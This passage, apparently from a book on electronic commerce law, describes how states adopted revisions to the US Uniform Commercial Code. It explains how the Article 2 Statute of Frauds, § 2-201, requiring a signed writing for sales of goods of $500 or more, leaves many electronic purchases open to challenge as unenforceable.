TE AM FL Y
[…] Although the states were often slow to modernize their laws to the initial version of the UCC, later revisions — particularly those affecting electronic commercial practices — have been adopted by the states more quickly and with fewer nonuniform variations. The UCC articles governing letters of credit, funds transfers, and secured transactions — each of which is strongly focused on electronic commercial practices — are now mainly uniform among the states. In marked contrast to the ongoing reforms of the UCC, however, the fundamental article (Article 2–Sales) has remained largely unchanged since its creation in the early 1960s. Among its provisions is § 2-201, the “Statute of Frauds.” This section sets forth the prevailing law in the United States: “a contract for the sale of goods for the price of $500 or more is not enforceable . . . unless there is some writing sufficient to indicate that a contract for sale has been made between the parties and signed by the party against whom enforcement is sought” (emphasis added). As a result, absent special agreement among the parties to do business electronically, many normal electronic purchasing practices could be challenged as unenforceable. Efforts to modernize Article 2 – Sales of the UCC have been in progress for nearly 10 years.